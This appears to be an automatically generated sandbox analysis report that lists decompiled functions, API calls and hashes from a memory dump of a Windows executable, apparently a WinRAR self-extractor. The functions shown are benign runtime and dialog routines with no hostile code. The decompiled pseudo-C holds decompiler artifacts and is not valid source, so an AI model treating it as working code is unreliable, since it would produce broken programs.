          • Instruction Fuzzy Hash: E1312332128316BEE314AFA0AC06FAFB79CDF51320F10450AF450962D3EF7499658BA6
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00208FE6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
          Download Yara Rule
          C-Code - Quality: 43%
          			E00208FE6(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t32;
				struct HWND__* _t43;
				intOrPtr* _t51;
				void* _t58;
				WCHAR* _t65;
				struct HWND__* _t66;

				_t66 = _a8;
				_t51 = __ecx;
				 *(__ecx + 8) = _t66;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t66, 0);
				E00208D3F(_t51, _a4);
				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
					L00212B4E( *((intOrPtr*)(_t51 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t32 = E0021668C(_t51, _t58);
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
				GetWindowRect(_t66,  &_v16);
				 *0x22df88(0,  *0x22dfd4(_t66,  &_v16, 2));
				if( *(_t51 + 4) != 0) {
					 *0x22df90( *(_t51 + 4));
				}
				_t39 = _v36;
				_t19 = _t39 + 1; // 0x1
				_t43 =  *0x22df98(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0x22dfd4(_t66, 0,  *_t51, _t51, _t58));
				 *(_t51 + 4) = _t43;
				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
					__eflags = _t43;
					if(_t43 != 0) {
						ShowWindow(_t43, 5);
						return  *0x22df8c( *(_t51 + 4));
					}
				} else {
					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
							_t43 = E00208E11(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
							_t65 = _t43;
							if(_t65 != 0) {
								ShowWindow(_t66, 5);
								SetWindowTextW(_t66, _t65);
								return L00212B4E(_t65);
							}
						}
					}
				}
				return _t43;
			}














          0x00208fef
          0x00208ff3
          0x00208ff9
          0x00208ffc
          0x00208fff
          0x0020900b
          0x00209014
          0x00209019
          0x0020901e
          0x00209024
          0x0020902a
          0x0020902e
          0x00209026
          0x00209026
          0x00209026
          0x00209034
          0x0020903b
          0x00209044
          0x0020905b
          0x00209065
          0x0020906a
          0x0020906a
          0x00209070
          0x0020907e
          0x002090ab
          0x002090b1
          0x002090b8
          0x002090f2
          0x002090f4
          0x002090f9
          0x00000000
          0x00209102
          0x002090ba
          0x002090bc
          0x002090c3
          0x002090c6
          0x002090cd
          0x002090d2
          0x002090d6
          0x002090db
          0x002090e3
          0x00000000
          0x002090ef
          0x002090d6
          0x002090c6
          0x002090bc
          0x0020910e

          APIs
          • ShowWindow.USER32(?,00000000), ref: 00208FFF
          • GetWindowRect.USER32(?,00000000), ref: 00209044
          • ShowWindow.USER32(?,00000005,00000000), ref: 002090DB
          • SetWindowTextW.USER32(?,00000000), ref: 002090E3
          • ShowWindow.USER32(00000000,00000005), ref: 002090F9
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Window$Show$RectText
          • String ID: RarHtmlClassName
          • API String ID: 3937224194-1658105358
          • Opcode ID: d9c49eaea692ff4691360701e74f03caecb2c3bde4254eb6245fba265911abcc
          • Instruction ID: dc1d7f63de9a0f58b2897fc607c696a2c29ff43c87dc5c9a771d1eaa2f6b80b1
          • Opcode Fuzzy Hash: d9c49eaea692ff4691360701e74f03caecb2c3bde4254eb6245fba265911abcc
          • Instruction Fuzzy Hash: 2C31BF31108301AFCB219FA4AD4CB9BBBA8EB48701F004559F94BAA097CB31D8A1CF65
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0021B506, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E0021B506(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E0021B4CA(_t45, 7);
					E0021B4CA(_t45 + 0x1c, 7);
					E0021B4CA(_t45 + 0x38, 0xc);
					E0021B4CA(_t45 + 0x68, 0xc);
					E0021B4CA(_t45 + 0x98, 2);
					E00217A50( *((intOrPtr*)(_t45 + 0xa0)));
					E00217A50( *((intOrPtr*)(_t45 + 0xa4)));
					E00217A50( *((intOrPtr*)(_t45 + 0xa8)));
					E0021B4CA(_t45 + 0xb4, 7);
					E0021B4CA(_t45 + 0xd0, 7);
					E0021B4CA(_t45 + 0xec, 0xc);
					E0021B4CA(_t45 + 0x11c, 0xc);
					E0021B4CA(_t45 + 0x14c, 2);
					E00217A50( *((intOrPtr*)(_t45 + 0x154)));
					E00217A50( *((intOrPtr*)(_t45 + 0x158)));
					E00217A50( *((intOrPtr*)(_t45 + 0x15c)));
					return E00217A50( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




          0x0021b50c
          0x0021b511
          0x0021b51a
          0x0021b525
          0x0021b530
          0x0021b53b
          0x0021b549
          0x0021b554
          0x0021b55f
          0x0021b56a
          0x0021b578
          0x0021b586
          0x0021b597
          0x0021b5a5
          0x0021b5b3
          0x0021b5be
          0x0021b5c9
          0x0021b5d4
          0x00000000
          0x0021b5e4
          0x0021b5e9

          APIs
            • Part of subcall function 0021B4CA: _free.LIBCMT ref: 0021B4F3
          • _free.LIBCMT ref: 0021B554
            • Part of subcall function 00217A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?), ref: 00217A66
            • Part of subcall function 00217A50: GetLastError.KERNEL32(?,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?,?), ref: 00217A78
          • _free.LIBCMT ref: 0021B55F
          • _free.LIBCMT ref: 0021B56A
          • _free.LIBCMT ref: 0021B5BE
          • _free.LIBCMT ref: 0021B5C9
          • _free.LIBCMT ref: 0021B5D4
          • _free.LIBCMT ref: 0021B5DF
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _free$ErrorFreeHeapLast
          • String ID:
          • API String ID: 776569668-0
          • Opcode ID: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
          • Instruction ID: 2ffb0e1e8edcfac1aade232b330d772ef67f954e466fff87925aa510411ceaa6
          • Opcode Fuzzy Hash: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
          • Instruction Fuzzy Hash: DB114272560708A6D621B770CC07FCF77FC6F50B01F408815B79E66053D765B5A44E60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00211694, Relevance: 10.6, APIs: 7, Instructions: 60COMMON
          Download Yara Rule
          C-Code - Quality: 95%
          			E00211694(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x22d680 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E0021288E(__eflags,  *0x22d680);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E002128C8(__eflags,  *0x22d680, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E00217B1B(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E002128C8(__eflags,  *0x22d680, 0);
								} else {
									__eflags = E002128C8(__eflags,  *0x22d680, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00217A50(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}








          0x0021169b
          0x002116ae
          0x002116b5
          0x002116b8
          0x002116bb
          0x002116d4
          0x002116d4
          0x002116bd
          0x002116bd
          0x002116bf
          0x002116c9
          0x002116cf
          0x002116d0
          0x002116d2
          0x002116e2
          0x002116e6
          0x002116e8
          0x002116fc
          0x002116fc
          0x00211705
          0x002116ea
          0x002116f8
          0x002116fa
          0x0021170e
          0x00211710
          0x00211710
          0x00000000
          0x00000000
          0x00000000
          0x002116fa
          0x00211713
          0x00000000
          0x00000000
          0x00000000
          0x002116d2
          0x002116bf
          0x0021171b
          0x00211725
          0x0021169d
          0x0021169f
          0x0021169f

          APIs
          • GetLastError.KERNEL32(?,?,0021168B,0020F0E2), ref: 002116A2
          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002116B0
          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002116C9
          • SetLastError.KERNEL32(00000000,?,0021168B,0020F0E2), ref: 0021171B
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ErrorLastValue___vcrt_
          • String ID:
          • API String ID: 3852720340-0
          • Opcode ID: d9dca083bac4d4b0ea296ea7e13376013d29517b265c1b367119e67a870cb3f8
          • Instruction ID: 291e759997063b8466499fdbcf2ad971734c58506c4917ed550fc5b09d232530
          • Opcode Fuzzy Hash: d9dca083bac4d4b0ea296ea7e13376013d29517b265c1b367119e67a870cb3f8
          • Instruction Fuzzy Hash: CE012832279212BEA7342EB57C894E62BCCEB313713310339F214811E1EF624CBA5954
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020D27B, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMON
          Download Yara Rule
          C-Code - Quality: 77%
          			E0020D27B() {
				intOrPtr _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t14;

				_t1 =  *0x24fe58;
				if(_t1 != 1) {
					if(_t1 == 0) {
						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
						if(_t14 != 0) {
							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
							if(_t3 == 0) {
								goto L5;
							} else {
								 *0x24fe5c = _t3;
								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
								if(_t6 == 0) {
									goto L5;
								} else {
									 *0x24fe60 = _t6;
								}
							}
						} else {
							L5:
							_t14 = 1;
						}
						asm("lock cmpxchg [edx], ecx");
						if(0 != 0 || _t14 != 1) {
							if(0 != 1) {
								_t5 = 1;
							} else {
								goto L12;
							}
						} else {
							L12:
							_t5 = 0;
						}
						return _t5;
					} else {
						return 1;
					}
				} else {
					return 0;
				}
			}








          0x0020d27b
          0x0020d286
          0x0020d28e
          0x0020d2a0
          0x0020d2a4
          0x0020d2b0
          0x0020d2b8
          0x00000000
          0x0020d2ba
          0x0020d2c0
          0x0020d2c5
          0x0020d2cd
          0x00000000
          0x0020d2cf
          0x0020d2cf
          0x0020d2cf
          0x0020d2cd
          0x0020d2a6
          0x0020d2a6
          0x0020d2a6
          0x0020d2a6
          0x0020d2dd
          0x0020d2e3
          0x0020d2eb
          0x0020d2f1
          0x00000000
          0x00000000
          0x00000000
          0x0020d2ed
          0x0020d2ed
          0x0020d2ed
          0x0020d2ed
          0x0020d2f5
          0x0020d290
          0x0020d293
          0x0020d293
          0x0020d288
          0x0020d28b
          0x0020d28b

          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID:
          • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
          • API String ID: 0-1718035505
          • Opcode ID: d2c76262dcdaa29313ef0f537c4f20d9c7fb6aa3cb12492b800e15fe97ba68d9
          • Instruction ID: b8b957139c9b7289eee56c889eaebd512f8370206e46eaab0d55a414c00ac8f8
          • Opcode Fuzzy Hash: d2c76262dcdaa29313ef0f537c4f20d9c7fb6aa3cb12492b800e15fe97ba68d9
          • Instruction Fuzzy Hash: 2301D175773363AF9F706EF86C9859623849A53B16310253AEC00D3293E751C876DAA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00200910, Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
          Download Yara Rule
          C-Code - Quality: 65%
          			E00200910(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v16;
				struct _SYSTEMTIME _v32;
				struct _SYSTEMTIME _v48;
				struct _FILETIME _v64;
				struct _FILETIME _v72;
				intOrPtr _v76;
				struct _FILETIME _v84;
				intOrPtr _t47;
				long _t61;
				intOrPtr* _t66;
				long _t72;
				intOrPtr _t73;
				intOrPtr* _t76;

				_t73 = __edx;
				_t66 = _a4;
				_t76 = __ecx;
				_v48.wYear =  *_t66;
				_v48.wMonth =  *((intOrPtr*)(_t66 + 4));
				_v48.wDay =  *((intOrPtr*)(_t66 + 8));
				_v48.wHour =  *((intOrPtr*)(_t66 + 0xc));
				_v48.wMinute =  *((intOrPtr*)(_t66 + 0x10));
				_v48.wSecond =  *((intOrPtr*)(_t66 + 0x14));
				_v48.wMilliseconds = 0;
				_v48.wDayOfWeek.wYear = 0;
				if(SystemTimeToFileTime( &_v48,  &_v64) == 0) {
					 *_t76 = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
				} else {
					if(E001FA995() >= 0x600) {
						FileTimeToSystemTime( &_v64,  &_v32);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v32,  &_v16);
						SystemTimeToFileTime( &(_v32.wDayOfWeek),  &_v84);
						SystemTimeToFileTime( &(_v48.wDayOfWeek),  &(_v72.dwHighDateTime));
						_t61 = _v84.dwHighDateTime + _v72.dwLowDateTime;
						asm("sbb eax, [esp+0x24]");
						asm("sbb eax, edi");
						asm("adc eax, edi");
						_t72 = 0 - _v72.dwHighDateTime.dwLowDateTime + _v84.dwLowDateTime + _v76;
						asm("adc eax, edi");
					} else {
						LocalFileTimeToFileTime( &_v64,  &_v72);
						_t61 = _v72.dwHighDateTime.dwLowDateTime;
						_t72 = _v72.dwLowDateTime;
					}
					 *_t76 = E0020DDC0(_t72, _t61, 0x64, 0);
					 *((intOrPtr*)(_t76 + 4)) = _t73;
				}
				_t47 =  *((intOrPtr*)(_t66 + 0x18));
				 *_t76 =  *_t76 + _t47;
				asm("adc [esi+0x4], edi");
				return _t47;
			}
















          0x00200910
          0x00200914
          0x00200923
          0x00200925
          0x0020092e
          0x00200937
          0x00200940
          0x00200949
          0x00200952
          0x00200959
          0x0020095e
          0x00200972
          0x00200a0e
          0x00200a10
          0x00200978
          0x00200984
          0x002009aa
          0x002009bb
          0x002009cb
          0x002009d7
          0x002009df
          0x002009e5
          0x002009ed
          0x002009f3
          0x002009f5
          0x002009f9
          0x00200986
          0x00200990
          0x00200996
          0x0020099a
          0x0020099a
          0x00200a05
          0x00200a07
          0x00200a07
          0x00200a13
          0x00200a16
          0x00200a18
          0x00200a22

          APIs
          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0020096E
            • Part of subcall function 001FA995: GetVersionExW.KERNEL32(?), ref: 001FA9BA
          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00200990
          • FileTimeToSystemTime.KERNEL32(?,?), ref: 002009AA
          • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 002009BB
          • SystemTimeToFileTime.KERNEL32(?,?), ref: 002009CB
          • SystemTimeToFileTime.KERNEL32(?,?), ref: 002009D7
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Time$File$System$Local$SpecificVersion
          • String ID:
          • API String ID: 2092733347-0
          • Opcode ID: 2a3d50267e000f0117baec7a3b9505121b648ca0908bf9a0c8592da94f24caaf
          • Instruction ID: ddcc1355dd6141e11c10abd0cfbab3b82568c76718504f689f4281fc6936c1a9
          • Opcode Fuzzy Hash: 2a3d50267e000f0117baec7a3b9505121b648ca0908bf9a0c8592da94f24caaf
          • Instruction Fuzzy Hash: A5310776118346EAC700DFA5D8849ABB7E8FF98704F04591EFA99C3211EB30D509CB26
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00208BE2, Relevance: 9.1, APIs: 6, Instructions: 86COMMON
          Download Yara Rule
          C-Code - Quality: 96%
          			E00208BE2(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t16;
				signed int _t22;
				void* _t25;
				signed int _t30;
				signed int* _t34;

				_t34 = _a12;
				if(_t34 != 0) {
					_t32 = _a8;
					_t25 = 0x10;
					if(E0020F3CA(_a8, 0x2240bc, _t25) == 0) {
						L13:
						_t30 = _a4;
						 *_t34 = _t30;
						L14:
						 *((intOrPtr*)( *_t30 + 4))(_t30);
						_t16 = 0;
						L16:
						return _t16;
					}
					if(E0020F3CA(_t32, 0x2240fc, _t25) != 0) {
						if(E0020F3CA(_t32, 0x2240dc, _t25) != 0) {
							if(E0020F3CA(_t32, 0x2240ac, _t25) != 0) {
								if(E0020F3CA(_t32, 0x22414c, _t25) != 0) {
									if(E0020F3CA(_t32, 0x22409c, _t25) != 0) {
										 *_t34 =  *_t34 & 0x00000000;
										_t16 = 0x80004002;
										goto L16;
									}
									goto L13;
								}
								_t30 = _a4;
								_t22 = _t30 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t34 =  ~_t30 & _t22;
								goto L14;
							}
							_t30 = _a4;
							_t22 = _t30 + 0xc;
							goto L11;
						}
						_t30 = _a4;
						_t22 = _t30 + 8;
						goto L11;
					}
					_t30 = _a4;
					_t22 = _t30 + 4;
					goto L11;
				}
				return 0x80004003;
			}








          0x00208be6
          0x00208beb
          0x00208bf9
          0x00208bfe
          0x00208c10
          0x00208c9f
          0x00208c9f
          0x00208ca2
          0x00208ca4
          0x00208ca7
          0x00208caa
          0x00208cb6
          0x00000000
          0x00208cb7
          0x00208c27
          0x00208c42
          0x00208c5d
          0x00208c78
          0x00208c9d
          0x00208cae
          0x00208cb1
          0x00000000
          0x00208cb1
          0x00000000
          0x00208c9d
          0x00208c7a
          0x00208c7d
          0x00208c80
          0x00208c84
          0x00208c88
          0x00000000
          0x00208c88
          0x00208c5f
          0x00208c62
          0x00000000
          0x00208c62
          0x00208c44
          0x00208c47
          0x00000000
          0x00208c47
          0x00208c29
          0x00208c2c
          0x00000000
          0x00208c2c
          0x00000000

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: _memcmp
          • String ID:
          • API String ID: 2931989736-0
          • Opcode ID: e854f057494ec57acfd7c26651d48619a73aedea68e8207df17eac0bb107ee79
          • Instruction ID: dd2dd453cb94fa15d971b442a2f49cb8e4db2b83a84365d3dd238a355432bb37
          • Opcode Fuzzy Hash: e854f057494ec57acfd7c26651d48619a73aedea68e8207df17eac0bb107ee79
          • Instruction Fuzzy Hash: 6621C77167030AABEB1C6F10DD81F3B73BC9B50758F04412AFC8496183EA74EDA587A0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00218516, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
          Download Yara Rule
          C-Code - Quality: 72%
          			E00218516(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x22d6ac; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00217B1B(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00219BA9(_t25, _t36, __eflags,  *0x22d6ac, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00218388(_t25, _t31, 0x250418);
							E00217A50(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00217A50();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00217AD8(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x22d6ac; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00217B1B(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00219BA9(_t27, _t37, __eflags,  *0x22d6ac, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00218388(_t27, _t32, 0x250418);
									E00217A50(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00217A50();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00219B53(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00219B53(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















          0x00218516
          0x00218516
          0x00218516
          0x00218520
          0x00218522
          0x00218527
          0x0021852a
          0x00218538
          0x0021853f
          0x00218544
          0x00218547
          0x0021854a
          0x0021855c
          0x00218561
          0x00218563
          0x0021856e
          0x00218575
          0x0021857a
          0x0021857d
          0x0021857f
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00218565
          0x00218565
          0x00000000
          0x00218565
          0x0021854c
          0x0021854c
          0x0021854d
          0x0021854d
          0x00218552
          0x0021858d
          0x0021858e
          0x00218594
          0x00218599
          0x0021859c
          0x0021859d
          0x0021859e
          0x002185a5
          0x002185a7
          0x002185a9
          0x002185ae
          0x002185b1
          0x002185bf
          0x002185cb
          0x002185ce
          0x002185d1
          0x002185e3
          0x002185e8
          0x002185ea
          0x002185f5
          0x002185fb
          0x00218603
          0x00218605
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x002185ec
          0x002185ec
          0x00000000
          0x002185ec
          0x002185d3
          0x002185d3
          0x002185d4
          0x002185d4
          0x00218607
          0x00218608
          0x00218608
          0x002185b3
          0x002185b9
          0x002185bd
          0x00218610
          0x00218611
          0x00218617
          0x00000000
          0x00000000
          0x00000000
          0x002185bd
          0x0021861e
          0x0021861e
          0x0021852c
          0x00218532
          0x00218536
          0x00218581
          0x00218582
          0x0021858c
          0x00000000
          0x00000000
          0x00000000
          0x00218536

          APIs
          • GetLastError.KERNEL32(?,002300E0,00213394,002300E0,?,?,00212E0F,?,?,002300E0), ref: 0021851A
          • _free.LIBCMT ref: 0021854D
          • _free.LIBCMT ref: 00218575
          • SetLastError.KERNEL32(00000000,?,002300E0), ref: 00218582
          • SetLastError.KERNEL32(00000000,?,002300E0), ref: 0021858E
          • _abort.LIBCMT ref: 00218594
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ErrorLast$_free$_abort
          • String ID:
          • API String ID: 3160817290-0
          • Opcode ID: c12212c2d5d9df739ddd21e27cc1857c26f0d8e6b089e8555e36241fe1ae61c2
          • Instruction ID: 1aa85b2ab55114a2ff099f3678887a523b480f84618729c82b4468a567bb0eaf
          • Opcode Fuzzy Hash: c12212c2d5d9df739ddd21e27cc1857c26f0d8e6b089e8555e36241fe1ae61c2
          • Instruction Fuzzy Hash: E2F0A4351A860176D32177757C8AEEB22EBCFF2761F660224F518A2191EE618BE28560
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020C2A7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
          Download Yara Rule
          C-Code - Quality: 83%
          			E0020C2A7(void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				void* _t12;
				WCHAR* _t16;
				void* _t17;
				struct HWND__* _t18;
				intOrPtr _t19;
				void* _t20;
				signed short _t23;

				_t16 = _a16;
				_t23 = _a12;
				_t19 = _a8;
				_t18 = _a4;
				if(E001F12D7(_t17, _t18, _t19, _t23, _t16, L"RENAMEDLG", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t20 = _t19 - 0x110;
				if(_t20 == 0) {
					 *0x24de34 = _t16;
					SetDlgItemTextW(_t18, 0x66, _t16);
					SetDlgItemTextW(_t18, 0x68,  *0x24de34);
					goto L10;
				}
				if(_t20 != 1) {
					L5:
					return 0;
				}
				_t12 = (_t23 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t18, 0x68,  *0x24de34, 0x800);
					_push(1);
					L7:
					EndDialog(_t18, ??);
					goto L10;
				}
				if(_t12 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}










          0x0020c2a8
          0x0020c2ad
          0x0020c2b2
          0x0020c2b7
          0x0020c2cf
          0x0020c32f
          0x00000000
          0x0020c331
          0x0020c2d1
          0x0020c2d7
          0x0020c31c
          0x0020c322
          0x0020c32d
          0x00000000
          0x0020c32d
          0x0020c2dc
          0x0020c2eb
          0x00000000
          0x0020c2eb
          0x0020c2e1
          0x0020c2e4
          0x0020c308
          0x0020c30e
          0x0020c2f1
